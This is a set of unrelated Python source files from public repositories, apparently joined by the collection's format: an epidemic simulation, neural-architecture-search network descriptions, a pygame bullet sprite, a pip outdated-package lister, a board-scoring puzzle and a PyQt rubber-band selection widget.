person_vaccine_eff = housemembers[person].vaccine_type_efficiency() if person_vaccinated else 0
infection_chance *= (1 - person_vaccine_eff)
caught_infection = random() < infection_chance
if caught_infection:
self.daily_new_infections += 1
if virus_id is None:
raise ValueError("House infection has incorrect virus type.")
self.pop.infect(index=housemembers[person].get_index(), day=day, virus_type=virus_id)
self.daily_interactions["HOUSE_STUDENT"][day] = total_house_interactions
def testing_site(self, tests_per_day, day):
"""Method to update status of symptoms and run the testing sites code.
Parameters
----------
tests_per_day : int
The max number of available tests for this given day.
day : int
The day value that this function is being called on in the encompassing simulation class.
"""
self.pop.update_uninfected_symptomatics()
self.pop.update_infected_symptomatics(day)
self.pop.get_tested(tests_per_day, day)
def get_grade_A_sites(self):
"""Method to return a copy of the grade_A_sites attribute.
Returns
-------
self.grade_A_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_A_sites)
def get_grade_B_sites(self):
"""Method to return a copy of the grade_B_sites attribute.
Returns
-------
self.grade_B_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_B_sites)
def get_grade_C_sites(self):
"""Method to return a copy of the grade_C_sites attribute.
Returns
-------
self.grade_C_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_C_sites)
def get_lect_sites(self):
"""Method to return a copy of the lect_sites attribute.
Returns
-------
self.lect_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.lect_sites)
def get_study_sites(self):
"""Method to return a copy of the study_sites attribute.
Returns
-------
self.study_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.study_sites)
def get_food_sites(self):
"""Method to return a copy of the food_sites attribute.
Returns
-------
self.food_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.food_sites)
def get_res_sites(self):
"""Method to return a copy of the res_sites attribute.
Returns
-------
self.res_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.res_sites)
| Queens-Physics/quaboom | cv19/interaction_sites.py | interaction_sites.py | py | 33,973 | python | en | code | 4 | github-code | 36 |
7755009879 | import numpy as np
import json
import copy
import functools
from tensorpack.utils import logger
from petridish.info.layer_info import LayerInfo, LayerInfoList, LayerTypes
class CellNetworkInfo(dict):
def __init__(self, master=None, normal=None, reduction=None):
super(CellNetworkInfo, self).__init__(locals())
self._cell_names = []
if master is not None:
self._cell_names.append('master')
if normal is not None:
self._cell_names.append('normal')
if reduction is not None:
self._cell_names.append('reduction')
@property
def master(self):
return self.get('master', None)
@master.setter
def master(self, val):
self['master'] = val
@property
def normal(self):
return self.get('normal', None)
@normal.setter
def normal(self, val):
self['normal'] = val
@property
def reduction(self):
return self.get('reduction', None)
@reduction.setter
def reduction(self, val):
self['reduction'] = val
@property
def cell_names(self):
return self._cell_names
@property
def operable_cell_names(self):
if self.normal is None:
return ['master']
elif self.reduction is None:
return ['normal']
return ['normal', 'reduction']
def is_cell_based(self):
return 'normal' in self.operable_cell_names
def to_str(self):
return json.dumps({key : self[key] for key in self._cell_names})
def sample_hallucinations(
self, layer_ops, merge_ops, prob_at_layer=None,
min_num_hallus=1, hallu_input_choice=None):
hallus = dict()
num_hallu_by_name = dict()
if len(self.operable_cell_names) > 1:
assert len(self.operable_cell_names) == 2, \
self.operable_cell_names
num_hallu_by_name['normal'] = min_num_hallus
num_hallu_by_name['reduction'] = min_num_hallus
else:
num_hallu_by_name[self.operable_cell_names[0]] = min_num_hallus
for cname in self.operable_cell_names:
n_hallus = num_hallu_by_name[cname]
if n_hallus == 0:
continue
if cname == 'master' or self[cname].is_end_merge_sum():
cell_based = (cname != 'master')
hallus[cname] = self[cname].sample_sum_hallucinations(layer_ops,
merge_ops, prob_at_layer, n_hallus, hallu_input_choice, cell_based)
else:
hallus[cname] = self[cname].sample_cat_hallucinations(layer_ops,
merge_ops, prob_at_layer, n_hallus, hallu_input_choice)
return hallus
def add_hallucinations(self, hallus,
final_merge_op=LayerTypes.MERGE_WITH_SUM,
stop_gradient_val=1,
hallu_gate_layer=LayerTypes.NO_FORWARD_LAYER):
for cname in hallus:
args = [hallus[cname], final_merge_op, stop_gradient_val, hallu_gate_layer]
if cname == 'master' or self[cname].is_end_merge_sum():
self[cname].add_sum_hallucinations(*args)
else:
self[cname].add_cat_hallucinations(*args)
return self
def contained_hallucination(self):
hallu_locs = dict()
for ci, cname in enumerate(self.operable_cell_names):
# candidate id to (start, end)
hid_to_range = self[cname].contained_hallucination()
for hid in hid_to_range:
hallu_locs[(ci, hid)] = hid_to_range[hid]
return hallu_locs
def sorted_hallu_indices(self, hallu_locs):
# sort by ci, then location in list
return sorted(hallu_locs, key=lambda ci_hid : (ci_hid[0], hallu_locs[ci_hid][0]))
def separate_hallu_info_by_cname(self, contained, hallu_indices, l_fs_ops, l_fs_omega):
"""
Args:
contained : a dict from (ci, hid) to (start, end) in self[operable_cnames[ci]]
hallu_indices : list of (ci, hid), in order by sorted_hallu_indices
l_fs_ops : list of list of int indices that represent the order of importance of
input op of the hallu feature selection. The first level list is in the
same order as hallu_indices (sorted by (ci,hid) ). These indices are the
ones that are chosen by each hallu.
l_fs_omega : list of list of float value that represent the importance value
whose abosolute value is in decreasing value. The first level is the in
the same order as l_op_indices and hallu_indices
These value are associated with the chosen operations.
"""
cell_names = self.operable_cell_names
# first break the info by cname so that we can call cell/layerInfoList level api.
# dictionary from hid to location (start, end)
lil_contained = { cname : dict() for cname in cell_names }
for ci_hid in contained:
ci, hid = ci_hid
cname = cell_names[ci]
lil_contained[cname][hid] = contained[ci_hid]
# hid in sorted order for each cname
lil_h_indices = { cname : [] for cname in cell_names }
for ci_hid in hallu_indices:
ci, hid = ci_hid
cname = cell_names[ci]
lil_h_indices[cname].append(hid)
# Feature selection info
if l_fs_ops is None or len(l_fs_ops) == 0:
lil_fs_ops = { cname : None for cname in cell_names }
lil_fs_omega = { cname : None for cname in cell_names }
else:
lil_fs_ops = { cname : [] for cname in cell_names }
lil_fs_omega = { cname : [] for cname in cell_names }
for ci_hid, fs_ops, fs_omega in zip(hallu_indices, l_fs_ops, l_fs_omega):
ci, hid = ci_hid
cname = cell_names[ci]
lil_fs_ops[cname].append(fs_ops)
lil_fs_omega[cname].append(fs_omega)
return (lil_contained, lil_h_indices, lil_fs_ops, lil_fs_omega)
def select_hallucination(self, selected, separated_hallu_info):
"""
selected : list of (ci, hid)
"""
cell_names = self.operable_cell_names
# selected hid for each cname
lil_selected = { cname : [] for cname in cell_names }
for ci_hid in selected:
ci, hid = ci_hid
cname = cell_names[ci]
lil_selected[cname].append(hid)
(lil_contained, lil_h_indices, lil_fs_ops, lil_fs_omega) = separated_hallu_info
# Invoke LayerInfoList select
for cname in cell_names:
lil_args = [lil_selected[cname], lil_contained[cname],
lil_h_indices[cname], lil_fs_ops[cname], lil_fs_omega[cname]
]
if cname == 'master' or self[cname].is_end_merge_sum():
self[cname] = self[cname].select_sum_hallucination(*lil_args)
else:
self[cname] = self[cname].select_cat_hallucination(*lil_args)
return self
@staticmethod
def calc_reduction_layers(num_cells, num_reduction_layers, num_init_reductions):
"""
Compute true_cell_idx of reduction layers
"""
reduction_layers = list(range(num_init_reductions))
for pool_num in range(1, num_reduction_layers + 1):
layer_num = (float(pool_num) / (num_reduction_layers + 1)) * num_cells
layer_num = int(layer_num) + pool_num - 1 + num_init_reductions
reduction_layers.append(layer_num)
return reduction_layers
@staticmethod
def default_master(n_normal_inputs=2, n_reduction_inputs=2,
num_cells=18, num_reduction_layers=2, num_init_reductions=0,
skip_reduction_layer_input=0, use_aux_head=1):
reduction_layers = CellNetworkInfo.calc_reduction_layers(
num_cells, num_reduction_layers, num_init_reductions)
master = LayerInfoList()
layer_id = 0
n_inputs = n_normal_inputs if num_init_reductions == 0 else n_reduction_inputs
for _ in range(n_inputs):
master.append(LayerInfo(layer_id=layer_id))
layer_id += 1
# true_num_cells counts cells from the first non-input with 0-based index
true_num_cells = num_cells + num_init_reductions + num_reduction_layers
for ci in range(true_num_cells):
info = LayerInfo(layer_id)
if ci in reduction_layers:
info.inputs = list(range(layer_id - n_reduction_inputs, layer_id))
n_in = len(info.inputs)
info.operations = [LayerTypes.IDENTITY] * n_in + ['reduction']
info.down_sampling = 1
else:
if (skip_reduction_layer_input and ci-1 in reduction_layers and
ci > num_init_reductions):
# imagenet : do not take the input of regular reduction as skip connection.
info.inputs = (list(range(layer_id - n_normal_inputs - 1, layer_id - 2)) +
[layer_id - 1])
else:
info.inputs = list(range(layer_id - n_normal_inputs, layer_id))
n_in = len(info.inputs)
info.operations = [LayerTypes.IDENTITY] * n_in + ['normal']
master.append(info)
layer_id += 1
# aux_weight at the last cell before the last reduction
if use_aux_head and len(reduction_layers) > 0:
master[reduction_layers[-1] - 1 + n_inputs].aux_weight = 0.4
master[-1].aux_weight = 1.0
return master
@staticmethod
def from_str(ss):
json_data = json.loads(ss)
return CellNetworkInfo.from_json_loads(json_data)
@staticmethod
def from_json_loads(json_data):
net_info = CellNetworkInfo()
if isinstance(json_data, list):
net_info['master'] = LayerInfoList.from_json_loads(json_data)
net_info.cell_names.append('master')
else:
for key in ['master', 'normal', 'reduction']:
jd = json_data.get(key, None)
if jd:
net_info[key] = LayerInfoList.from_json_loads(jd)
net_info.cell_names.append(key)
return net_info
@staticmethod
def to_seq(rmi):
return None
@staticmethod
def seq_to_img_flag(seq, max_depth=128, make_batcch=False):
return None
@staticmethod
def seq_to_hstr(rmi, not_exist_str='--'):
return None
@staticmethod
def str_to_seq(ss):
return CellNetworkInfo.to_seq(CellNetworkInfo.from_str(ss))
def net_info_from_str(ss):
if ss[0] == '{' and ss[-1] == '}' and LayerInfoList.DELIM in ss:
# this is for backward compatibility
ss = '[ ' + ss.replace(LayerInfoList.DELIM, ' , ') + ' ]'
json_data = json.loads(ss)
return CellNetworkInfo.from_json_loads(json_data)
"""
Examples for resnet, nasnet-a
"""
def separable_resnet_cell_info(next_id=0, input_ids=[0, 1],
end_merge=LayerTypes.MERGE_WITH_CAT):
LT = LayerTypes
l_info = LayerInfoList(
[
LayerInfo(input_ids[0]),
LayerInfo(input_ids[1]),
LayerInfo(
next_id+2,
inputs=[input_ids[1], input_ids[1]],
operations=[
LT.SEPARABLE_CONV_3_2,
LT.IDENTITY,
LT.MERGE_WITH_SUM
]
)
])
return ensure_end_merge(l_info, end_merge)
separable_resnet_cell_info.n_inputs = 2
def basic_resnet_cell_info(next_id=0, input_ids=[0, 1],
end_merge=LayerTypes.MERGE_WITH_CAT):
LT = LayerTypes
l_info = LayerInfoList(
[
LayerInfo(input_ids[0]),
LayerInfo(input_ids[1]),
LayerInfo(
next_id+2,
inputs=[input_ids[1]],
operations=[
LT.CONV_3,
LT.MERGE_WITH_NOTHING
]
),
LayerInfo(
next_id+3,
inputs=[next_id+2, input_ids[1]],
operations=[
LT.CONV_3,
LT.IDENTITY,
LT.MERGE_WITH_SUM
]
)
])
return ensure_end_merge(l_info, end_merge)
basic_resnet_cell_info.n_inputs = 2
def fully_connected_resnet_cell_info(next_id=0, input_ids=[0, 1],
end_merge=LayerTypes.MERGE_WITH_CAT):
LT = LayerTypes
l_info = LayerInfoList(
[
LayerInfo(input_ids[0]),
LayerInfo(input_ids[1]),
LayerInfo(
next_id+2, inputs=[input_ids[1]],
operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
)
])
return ensure_end_merge(l_info, end_merge)
fully_connected_resnet_cell_info.n_inputs = 2
def fully_connected_rnn_base_cell_info(next_id=0, input_ids=[0,1],
end_merge=LayerTypes.MERGE_WITH_CAT):
"""
See implementation of PetridishRNNCell to see an example of
how this list of info is used.
The first two info are x_and_h and init_layer, which is a
projected x_and_h multiplied with gate.
The rest of layers use specified operation to morph the layers.
This is DARTS v2.
"""
LT = LayerTypes
l_info = LayerInfoList(
[
LayerInfo(input_ids[0]), # next_id + 0
LayerInfo(input_ids[1]), # next_id + 1
LayerInfo(
next_id+2, inputs=[input_ids[1]],
operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+3, inputs=[next_id+2],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+4, inputs=[next_id+2],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+5, inputs=[next_id+2],
operations=[LT.FC_IDEN_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+6, inputs=[next_id+3],
operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+7, inputs=[next_id+6],
operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+8, inputs=[next_id+4],
operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+9, inputs=[next_id+6],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+10,
inputs=[
next_id+1, next_id+2, next_id+3,
next_id+4, next_id+5, next_id+6,
next_id+7, next_id+8, next_id+9,],
operations=[
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.MERGE_WITH_AVG]
)
])
return l_info
fully_connected_rnn_base_cell_info.n_inputs = 2
def darts_rnn_base_cell_info(
next_id=0, input_ids=[0,1],
end_merge=LayerTypes.MERGE_WITH_CAT):
"""
See implementation of PetridishRNNCell to see an example of
how this list of info is used.
The first two info are x_and_h and init_layer, which is a
projected x_and_h multiplied with gate.
The rest of layers use specified operation to morph the layers.
This is DARTS from the paper writing
"""
LT = LayerTypes
l_info = LayerInfoList(
[
LayerInfo(input_ids[0]), # next_id + 0
LayerInfo(input_ids[1]), # next_id + 1
LayerInfo(
next_id+2, inputs=[input_ids[1]],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+3, inputs=[next_id+2],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+4, inputs=[next_id+3],
operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+5, inputs=[next_id+4],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+6, inputs=[next_id+5],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+7, inputs=[next_id+2],
operations=[LT.FC_IDEN_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+8, inputs=[next_id+6],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+9, inputs=[next_id+2],
operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
),
LayerInfo(
next_id+10,
inputs=[
next_id+1, next_id+2, next_id+3,
next_id+4, next_id+5, next_id+6,
next_id+7, next_id+8, next_id+9,],
operations=[
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
LT.MERGE_WITH_AVG]
)
])
return l_info
darts_rnn_base_cell_info.n_inputs = 2
def resnet_bottleneck_cell_info(down_sampling=0):
raise NotImplementedError("not implemented due to changing filter sizes")
def nasneta_cell_info(
next_id=0, input_ids=[0, 1],
end_merge=LayerTypes.MERGE_WITH_CAT):
LT = LayerTypes
l_info = LayerInfoList()
l_info.extend([
LayerInfo(input_ids[0]),
LayerInfo(input_ids[1]), # most recent layer
LayerInfo(next_id+2, inputs=[input_ids[1], input_ids[0]],
operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_3_2, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+3, inputs=[input_ids[0], input_ids[0]],
operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_3_2, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+4, inputs=[input_ids[1], input_ids[0]],
operations=[LT.AVGPOOL_3x3, LT.IDENTITY, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+5, inputs=[input_ids[0], input_ids[0]],
operations=[LT.AVGPOOL_3x3, LT.AVGPOOL_3x3, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+6, inputs=[input_ids[1], input_ids[1]],
operations=[LT.SEPARABLE_CONV_3_2, LT.IDENTITY, LT.MERGE_WITH_SUM]),
])
l_info.append(cat_unused(l_info, next_id+7, end_merge))
return l_info
nasneta_cell_info.n_inputs = 2
def nasnata_reduction_cell_info(
next_id=0, input_ids=[0, 1],
end_merge=LayerTypes.MERGE_WITH_CAT):
LT = LayerTypes
l_info = LayerInfoList()
l_info.extend([
LayerInfo(input_ids[0]),
LayerInfo(input_ids[1]), # most recent layer
LayerInfo(next_id+2, inputs=[input_ids[1], input_ids[0]],
operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_7_2, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+3, inputs=[input_ids[1], input_ids[0]],
operations=[LT.MAXPOOL_3x3, LT.SEPARABLE_CONV_7_2, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+4, inputs=[input_ids[1], input_ids[0]],
operations=[LT.AVGPOOL_3x3, LT.SEPARABLE_CONV_5_2, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+5, inputs=[next_id+3, next_id+2],
operations=[LT.IDENTITY, LT.AVGPOOL_3x3, LT.MERGE_WITH_SUM]),
LayerInfo(next_id+6, inputs=[next_id+2, input_ids[1]],
operations=[LT.SEPARABLE_CONV_3_2, LT.MAXPOOL_3x3, LT.MERGE_WITH_SUM]),
])
l_info.append(cat_unused(l_info, next_id+7, end_merge))
return l_info
nasnata_reduction_cell_info.n_inputs = 2
def cat_unused(layer_info_list, layer_id, end_merge):
is_used = set()
layer_dict = set()
for li, info in enumerate(layer_info_list):
if LayerInfo.is_input(info):
is_used.add(li)
continue
for in_id in info.inputs:
is_used.add(in_id)
layer_dict.add(li)
inputs = [info.id for info in layer_info_list if not info.id in is_used]
ops = [LayerTypes.IDENTITY] * (len(inputs) + 1)
ops[-1] = end_merge
info = LayerInfo(layer_id, inputs=inputs, operations=ops)
return info
def ensure_end_merge(l_info, end_merge):
LT = LayerTypes
assert len(l_info) > 0, l_info
if end_merge != l_info[-1].merge_op:
last_id = l_info[-1].id
l_info.append(LayerInfo(last_id + 1, inputs=[last_id],
operations=[LT.IDENTITY, end_merge]))
return l_info
def replace_wsum_with_catproj(net_info):
l_lil = []
if net_info.is_cell_based():
if net_info.normal:
l_lil.append(net_info.normal)
if net_info.reduction:
l_lil.append(net_info.reduction)
else:
l_lil.append(net_info.master)
for lil in l_lil:
for info in lil:
if info.merge_op == LayerTypes.MERGE_WITH_WEIGHTED_SUM:
info.merge_op = LayerTypes.MERGE_WITH_CAT_PROJ
return net_info
def add_aux_weight(net_info, aux_weight=0.4):
last_orig_id = net_info.master[-1].id
has_pass_reduction = False
for info in reversed(net_info.master):
if info.down_sampling:
has_pass_reduction = True
elif has_pass_reduction and info.id < last_orig_id:
info.aux_weight = aux_weight
break
return net_info
def net_info_cifar_to_ilsvrc(net_info, s_type, use_latest_input=False):
# if there are reduction cell, then use reduction cell twice.
# if there are no reduction cell, then use s_type=imagenet
assert isinstance(net_info, CellNetworkInfo), \
"{} is not CellNetworkInfo.".format(net_info)
# number of reduction that already happened.
if s_type == 'imagenet':
n_stem_reductions = 2
elif s_type == 'basic':
n_stem_reductions = 0
elif s_type == 'conv3' or s_type == 'conv7':
n_stem_reductions = 1
n_model_reductions = sum([info.down_sampling for info in net_info.master])
# number of reduction required at start
n_extra_reductions = 5 - n_model_reductions - n_stem_reductions
if n_extra_reductions <= 0:
return net_info
next_lid = max([info.id for info in net_info.master])
n_inputs = 2
layer_ids = [net_info.master[n_inputs - 1].id] * n_inputs
is_cell_based = bool(net_info.get('reduction', None))
l_to_insert = []
for _ in range(n_extra_reductions):
next_lid += 1
if is_cell_based:
operations = [LayerTypes.IDENTITY] * n_inputs + ['reduction']
else:
operations = [
LayerTypes.SEPARABLE_CONV_7_2,
LayerTypes.IDENTITY,
LayerTypes.MERGE_WITH_SUM
]
info = LayerInfo(
next_lid,
inputs=layer_ids[-n_inputs:],
operations=operations,
down_sampling=1)
layer_ids.append(next_lid)
l_to_insert.append(info)
# rewire later layers that use inputs directly
def mapped_input(old_idx):
if use_latest_input:
return layer_ids[n_extra_reductions + n_inputs - 1]
return layer_ids[n_extra_reductions + old_idx]
remap_dict = dict(
[(info.id, mapped_input(idx)) \
for idx, info in enumerate(net_info.master[:n_inputs])])
for info in net_info.master:
for idx, inid in enumerate(info.inputs):
newid = remap_dict.get(inid, None)
if newid is not None:
info.inputs[idx] = newid
# insertion
net_info.master[n_inputs:n_inputs] = l_to_insert
return net_info
def increase_net_info_size(net_info, multiplier=2):
"""
Increase the size of a macro net_info to be multiplier
times of the original size. This is used after macro
searching on small models to enable deeper models.
Algorithm:
1. We first find where the cells start and end, using
_is_end_of_cell(). Check the assumptions there.
2. For each cell, the inner cell connections are kept
the same.
3. The connections to previous end of cells are considered
as relative.
4. Each cell is repeated multiplier number of times,
the repeats are inserted before the real one,
Args:
net_info : a CellNetworkInfo for macro search.
multiplier (int or list of int) :
If it is int, the number of times each normal cell is repeated.
If it is a list, it is the periodic multiplier applied to each normal cell.
return:
A modified original net_info. Note that the original is changed.
"""
l_info = net_info.master
n_inputs = l_info.num_inputs()
end_cell_indices = list(range(n_inputs))
orig_end_cell_ids = [
l_info[idx].id for idx in end_cell_indices
]
next_id = 0
for info in l_info:
next_id = max(next_id, info.id)
idx = start = n_inputs
id_to_idx = dict()
normal_cnt = 0
if isinstance(multiplier, int):
multiplier = [multiplier]
while idx < len(l_info):
# using while loop as l_info is getting longer
id_to_idx[l_info[idx].id] = idx
if not l_info._is_end_of_cell(idx):
idx += 1
continue
n_copies = 0
if not l_info[idx].down_sampling:
n_copies = multiplier[normal_cnt % len(multiplier)] - 1
normal_cnt += 1
cell_size = idx - start + 1
# make copies.
for cp_idx in range(n_copies):
l_info[start:start] = copy.deepcopy(l_info[start:idx+1])
for info in l_info[start:idx+1]:
next_id += 1
info.id = next_id
inputs = info.inputs
for in_idx, in_id in enumerate(inputs):
if in_id in id_to_idx.keys():
idx_in_l_info = id_to_idx[in_id] + cp_idx * cell_size
else:
n_prev = None
for _i, _id in enumerate(reversed(orig_end_cell_ids)):
if _id == in_id:
n_prev = _i + 1
break
idx_in_l_info = end_cell_indices[-n_prev]
inputs[in_idx] = l_info[idx_in_l_info].id
info.inputs = inputs
# copied cells never produces aux predictions.
info.aux_weight = 0
end_cell_indices.append(idx)
start = idx + 1
idx += cell_size
# modify the original for the cell connections
for info in l_info[start:idx+1]:
inputs = info.inputs
for in_idx, in_id in enumerate(inputs):
if in_id not in id_to_idx.keys():
n_prev = None
for _i, _id in enumerate(reversed(orig_end_cell_ids)):
if _id == in_id:
n_prev = _i + 1
break
inputs[in_idx] = l_info[end_cell_indices[-n_prev]].id
info.inputs = inputs
end_cell_indices.append(idx)
orig_end_cell_ids.append(l_info[idx].id)
id_to_idx = dict()
idx = start = end_cell_indices[-1] + 1
#end while
net_info.master = l_info
return net_info
| microsoft/petridishnn | petridish/info/net_info.py | net_info.py | py | 27,723 | python | en | code | 111 | github-code | 36 |
5850629924 | #coding: utf-8
import pygame
from block import Block
import constants
#insert this class in ship method gen_shoot()
class Bullet(Block):
def __init__(self,x,y, sign, speed, targets_nopoints= None, targets_points=None, point_receptor=None):
super(Bullet, self).__init__(x,y,10,10,constants.YELLOW)
self.dir_x = 0
self.dir_y = -1*sign*speed
#Next 2 shall be pygame.sprite.Group()...
if isinstance(targets_nopoints, pygame.sprite.Group):
self.t_n_points= targets_nopoints
else:
self.t_n_points= None
if isinstance(targets_points, pygame.sprite.Group):
self.t_w_points= targets_points #must have self.value...
self.point_receptor=point_receptor #must have change_points_by(x) method
else:
self.t_w_points= None
def update(self):
#always go up
self.rect.y += self.dir_y
#verify if within bounds
if self.rect.y < 0 or self.rect.y >= constants.SCREEN_HEIGHT:
self.kill() #removes from ALL the pygame's Groups
del self
return
if self.t_n_points != None:
collision_list = pygame.sprite.spritecollide(self, self.t_n_points, True)
#Having spritecollide set to True destroys obstacles
if len(collision_list)>0:
self.kill()
if self.t_w_points != None:
collision_list = pygame.sprite.spritecollide(self, self.t_w_points, True)
#Having spritecollide set to True destroys obstacles
if len(collision_list)>0:
self.kill()
for el in collision_list:
self.point_receptor.change_points_by(el.value)
| RafaelPAndrade/Pixel_Martians | bullet.py | bullet.py | py | 1,487 | python | en | code | 0 | github-code | 36 |
12546585829 | """
ospopen.py
This programs lists your outdated Python packages and the latest version available.
"""
import sys
import os
infile = os.popen("/Library/Frameworks/Python.framework/Versions/3.6/bin"
"/pip3 list -o") #Create a child process and a pipe.
lines = infile.readlines() #lines is a list of lines.
status = infile.close()
if status != None: #status is supposed to be None.
print("\"pip3 list -o\" produced exit status", status)
sys.exit(1)
lines = [line.rstrip() for line in lines] #Remove trailing newline.
for i, line in enumerate(lines, start = 1):
print("{} {}".format(i, line))
print()
print("You have", i , "outdated Python librairies.")
sys.exit(0)
| zeeboo26/Python-INFO1-CE9990 | ospopen.py | ospopen.py | py | 822 | python | en | code | 0 | github-code | 36 |
13070086793 | def boardScore(A):
A = [a.split() for a in A]
res = 0
m, n = len(A), len(A[0])
def dfs(i, j, flag):
nonlocal score, area
if i >= m or j >= n or i < 0 or j < 0 or not A[i][j] or A[i][j][0] != flag or A[i][j] == '#':
return
score += int(A[i][j][1:])
area += 1
A[i][j] = '#'
for di, dj in ((1, 0), (-1, 0), (0, 1), (0, -1)):
dfs(i + di, j + dj, flag)
for i in range(m):
for j in range(n):
score = 0
area = 0
dfs(i, j, A[i][j][0])
res += score * area
return res
print(boardScore(["S0 W1 W1 W0 L2",
"W0 W0 T0 T0 T0",
"W0 W1 T0 M2 M1",
"S0 L0 S1 S0 S0",
"M0 R2 R0 S1 T0"])) | Jason003/Interview_Code_Python | Airbnb/board score.py | board score.py | py | 787 | python | en | code | 3 | github-code | 36 |
43494226202 | from PyQt4 import QtGui, QtCore
#
#
# class RubberbandEnhancedLabel(QtGui.QLabel):
#
# def __init__(self, parent=None):
# QtGui.QLabel.__init__(self, parent)
# self.selection = QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self)
#
# def mousePressEvent(self, event):
# '''
# Mouse is pressed. If selection is visible either set dragging mode (if close to border) or hide selection.
# If selection is not visible make it visible and start at this point.
# '''
#
# if event.button() == QtCore.Qt.LeftButton:
#
# position = QtCore.QPoint(event.pos())
# if self.selection.isVisible():
# # visible selection
# if (self.upper_left - position).manhattanLength() < 20:
# # close to upper left corner, drag it
# self.mode = "drag_upper_left"
# elif (self.lower_right - position).manhattanLength() < 20:
# # close to lower right corner, drag it
# self.mode = "drag_lower_right"
# else:
# # clicked somewhere else, hide selection
# #self.selection.show()#hide()
# pass
# else:
# # no visible selection, start new selection
# self.upper_left = position
# self.lower_right = position
# self.mode = "drag_lower_right"
# self.selection.show()
#
# def mouseMoveEvent(self, event):
# '''
# Mouse moved. If selection is visible, drag it according to drag mode.
# '''
# if self.selection.isVisible():
# # visible selection
# if self.mode is "drag_lower_right":
# self.lower_right = QtCore.QPoint(event.pos())
# elif self.mode is "drag_upper_left":
# self.upper_left = QtCore.QPoint(event.pos())
# # update geometry
# self.selection.setGeometry(QtCore.QRect(self.upper_left, self.lower_right).normalized())
#
#
#
from pyqtgraph import *
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
class RubberbandEnhancedLabelMultiple(QtGui.QLabel):
def __init__(self, parent=None):
self.max_bboxes = 10
QtGui.QLabel.__init__(self, parent)
self.selections = []#[QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self) for i in range(self.max_bboxes)]
self.active_bboxes = 0
# for s in self.selections:
# s.hide()
self.upper_left = []#[QtCore.QPoint() for i in range(self.max_bboxes)]
self.lower_right = []#[QtCore.QPoint() for i in range(self.max_bboxes)]
self.mode = []#[" " for i in range(self.max_bboxes)]
self.category = []#[0]*self.max_bboxes
self.reg = 0
self.color = QtGui.QColor('red')#QtGui.QPalette(QtGui.QColor('red'))
#self.color.setBrush(QtGui.QPalette.Foreground, QtGui.QBrush(QtGui.QColor('red')))
#self.color.setBrush(QtGui.QPalette.Base, QtGui.QBrush(QtGui.QColor('red')))
self.curr_id = 0
self.id = []
self._pixmap = QPixmap(self.width(), self.height())
def change_color(self, i):
d = {0:QtGui.QColor('red'), 1:QtGui.QColor('blue'), 2:QtGui.QColor('green'), 3:QtGui.QColor('black')}
self.color = QtGui.QColor(d[i])
self.reg = i
def mousePressEvent(self, event):
'''
Mouse is pressed. If selection is visible either set dragging mode (if close to border) or hide selection.
If selection is not visible make it visible and start at this point.
'''
# self.setPixmap(self._pixmap)
# self.update()
if event.button() == QtCore.Qt.LeftButton:
#self.mode = [" " for i in range(self.max_bboxes)]
print ("press")
i = 0
fl = 0
min_i = 0
min_sh = 10000
string = "saaaas"
position = QtCore.QPoint(event.pos())
for sel in self.selections:
if sel.isVisible():
# visible selection
if (self.upper_left[i] - position).manhattanLength() < min_sh:
# close to upper left corner, drag it
fl = 1
